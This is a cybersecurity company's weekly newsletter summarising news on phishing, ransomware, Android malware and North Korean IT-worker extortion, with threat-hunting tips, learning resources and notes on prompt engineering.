Hello there 👋
Welcome back to the Kraven Security weekly newsletter. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
New Phishing Tactics Exploit GitHub, Telegram Bots, and QR Codes
Cybercriminals are now leveraging GitHub repositories, Telegram bots, and even ASCII/Unicode QR codes to orchestrate sophisticated phishing attacks.
Key takeaways:
🪲 GitHub Exploitation: Cyber attackers use GitHub to host malicious files, often through comments or issues that are quickly deleted to evade detection.
🤖 Telegram Bot Abuse: Bots are programmed to automate phishing by interacting with victims, making scams more convincing and efficient.
🖼️ Innovative QR Codes: Scammers employ QR codes made from ASCII and Unicode characters, which are harder for security systems to flag.
🏦 Targeted Attacks: The finance sector is particularly at risk, with attackers using these tools to distribute malware such as Remcos RAT.
Escalating Cyber Threats: Insights into 2024’s Ransomware Landscape
Ransomware attacks are on the rise with a significant focus on healthcare, leveraging new vulnerabilities in ESXi hypervisors for mass encryption. Microsoft reports a troubling increase in human-operated attacks, doubling data exfiltration incidents, highlighting a shift towards more sophisticated cybercrime tactics.
Key takeaways:
🔒 Increased Sophistication: Human-operated ransomware attacks have tripled, indicating a shift towards more targeted and complex cyber operations, with attackers now frequently engaging in data theft alongside encryption.
🏥 Healthcare in the Crosshairs: The healthcare sector remains a prime target, with 34 organizations affected indirectly through a third-party service provider, showcasing the ripple effect of ransomware attacks through supply chains.
💻 ESXi Exploit: Cybersecurity researchers discovered a widespread exploit of ESXi hypervisors, allowing attackers administrative access and the capability to encrypt entire systems, disrupting virtual machine operations.
📈 Data Theft Surge: There’s been a noticeable increase in data exfiltration, with attackers not just encrypting but also stealing data, escalating the risks for affected organizations.
🚨 Ransomware Tracker Insights: May 2024 saw a peak in claimed ransomware victims, with groups like LockBit making significant noise, though the accuracy of these claims remains under scrutiny.
UK Schools Gain Enhanced Cyber Defense with PDNS Expansion
The UK’s NCSC has expanded its PDNS for Schools service, now offering enhanced cyber protection against threats like ransomware to all UK educational institutions for free. This move is part of a broader initiative to bolster cybersecurity in the education sector amidst rising cyber threats.
Key takeaways:
🛡️ Enhanced Cyber Protection: The UK’s National Cyber Security Centre (NCSC) has expanded its Protective Domain Name System (PDNS) service to all UK schools, including academies, independent schools, and multi-academy trusts.
📚 Free Service for All: This service, now available through partnerships with Cloudflare and Accenture, aims to block access to malicious websites at no cost to educational institutions.
🚨 Combatting Rising Threats: The expansion follows reports of significant cyber incidents in UK schools, with an aim to protect against malware, ransomware, and phishing attacks.
🔒 Encouragement to Adopt: Schools and educational service providers are encouraged to register for PDNS through MyNCSC, enhancing their resilience against online threats.
🌐 Broader Cybersecurity Initiative: Part of a larger effort by NCSC to improve cybersecurity across the education sector, reflecting increased cyber threats like cryptojacking and IoT malware.
National Cyber Security Centre (NCSC)
TrickMo Malware Targets Android Users with PIN-Stealing Fake Lock Screens
New Android malware, TrickMo, tricks users into revealing their PIN via fake lock screens. Protect your device by staying vigilant and updating apps regularly!
Key takeaways:
🔍 Fake Lock Screen: TrickMo disguises itself as a legitimate lock screen prompt, prompting users to enter their PIN to unlock their device.
🛑 PIN Theft: Once entered, the malware captures the PIN, potentially granting unauthorized access to the device.
📲 Delivery Method: The malware is often disguised within fake apps or via phishing links, exploiting users’ trust in familiar app interfaces.
🛡️ Mitigation: Regularly updating your Android apps and being cautious with app installations can help protect against such threats.
🔄 Ongoing Threat: This type of attack underscores the importance of constant vigilance in cybersecurity practices.
North Korean IT Workers Escalate Cyber Threats with Data Theft and Extortion
Undercover North Korean IT workers are not just stealing data but now extorting employers with the threat of information leaks. Western companies are becoming unwitting victims in this sophisticated scheme, fueling North Korea’s illicit revenue streams.
Key takeaways:
💻 Data Theft: North Korean IT professionals, after gaining employment under false pretenses, steal sensitive data from their unsuspecting employers.
💰 Ransom Demands: Following termination or after amassing enough data, these workers demand ransoms to not leak the information, escalating from mere salary fraud to outright extortion.
🌐 Laptop Farms: They use “laptop farms” in the US to appear as if they’re working locally, routing their activities through these setups to mask their true location.
🔍 Coordination and Tactics: Referred by names like “Nickel Tapestry” or “UNC5267”, they use VPNs, remote access software, and even residential proxies to coordinate their activities covertly.
🤝 Employer Unwittingly Involved: Companies, including major corporations, have fallen victim, highlighting a significant vulnerability in remote hiring and cybersecurity practices.
Top Tips of the Week
Threat Intelligence
- Regularly update CTI analysts’ skills. Continuous learning ensures expertise aligns with evolving threat landscapes.
- Conduct regular threat intelligence exercises. Simulate scenarios to test CTI readiness and identify areas for improvement.
Threat Hunting
- Understand the tactics, techniques, and procedures (TTPs) of cyber threat actors. Identify and respond effectively to their methods.
- Develop hypotheses for cyber threat hunting. Form educated guesses about potential threats and use them as guides in your investigations.
- Implement a response plan. Be prepared to act swiftly when a threat is detected. A well-defined plan is crucial.
- Monitor supply chain risks in cyber threat hunting. Assess and address vulnerabilities to mitigate potential threats.
Custom Tooling
- Implement error reporting and analysis in custom tools. Quickly identify and address issues to maintain tool reliability.
Feature Article
MISP (Malware Information Sharing Platform and Threat Sharing) is an open-source threat intelligence platform that allows you to share, collate, analyze, and distribute threat intelligence.
Discover how to use web interface and API to export attributes from your MISP instance as IOCs. Then, upload these IOCs to your security solutions for detection and blocking either manually or automatically.
Learning Resources
Detection as Code: Why You Should Consider It
In this video, David French walks through how to build a “Detection-as-Code” pipeline, discussing the importance of automating detection rules in cybersecurity tools. He shares practical examples of integrating DevOps practices into security, using CI/CD pipelines, version control, and collaboration to create a detection system that catches security threats more effectively.
The video emphasizes the growing popularity of detection-as-code approaches, highlighting the benefits of using automation to manage security rules. By integrating tools like GitLab and GitHub for version control and CI/CD pipelines for deployment, teams can ensure that their detection rules are efficient, tested, and well-maintained. This system allows for better collaboration and a more resilient defense against potential security threats.
Watchmaker to Threat Hunter
In this captivating episode from “Simply Defensive,” where Jibby, a former watch repairman, shares his unique path into cybersecurity. Despite lacking a tech background, Jibby’s determination led him to transition from watch repair to becoming a threat hunter at Microsoft.
From starting with a basic laptop to mastering cybersecurity tools like KC7, Jibby exemplifies how passion and persistence can lead to success in a highly technical field. His journey from watchmaker to a Microsoft security researcher highlights the power of curiosity, mentorship, and continuous learning in the world of threat hunting.
Discover the Powerful Python Features in VSCode
Python developer? Learn to make the most of VSCode with these essential features to improve productivity, including generating Jupyter notebook cells directly in Python files, Auto Docstring, and Pylance.
The video also explores the value of using VSCode’s Live Share feature for real-time collaboration, allowing developers to share their workspaces and terminals with teammates seamlessly. These features, combined with tips on configuration, help Python developers streamline their workflow in VSCode.
What’s Going on With WordPress?
WordPress is blowing up right now as the legal conflict between Matt Mullenweg, WordPress founder, and WP Engine over royalties and trademark use heats up. Mullenweg faces criticism for his leadership, while Automattic, his company, demands millions from WP Engine, leading to lawsuits and public disputes.
Despite the drama, WordPress continues to dominate web development, powering over 40% of websites. However, the tension between these companies raises questions about open-source ethics and the future of the WordPress ecosystem.
This video by Fireship beautifully sums up the ongoing situation.
Personal Notes
🤔 The push to better use AI has been the focus of this week. The team and I have been researching and experimenting with “prompt engineering” to inject AI into our current workflow.
AI offers the chance to automate, streamline, and make many of our processes more efficient. Mastering prompt engineering is key to integrating AI into our operations so we can extract the maximium benefit. Hence, most of the week has been spent trying different AI models, trying different combinations of prompts and prompt elements, and sharing what we have learned across the business.
I recommend everyone, from cyber security professionals to business leaders, explore how AI can benefit them by learning about prompt engineering! I good book to get you started is Unlocking the Secrets of Prompt Engineering or check out the Jeff Su YouTube channel.
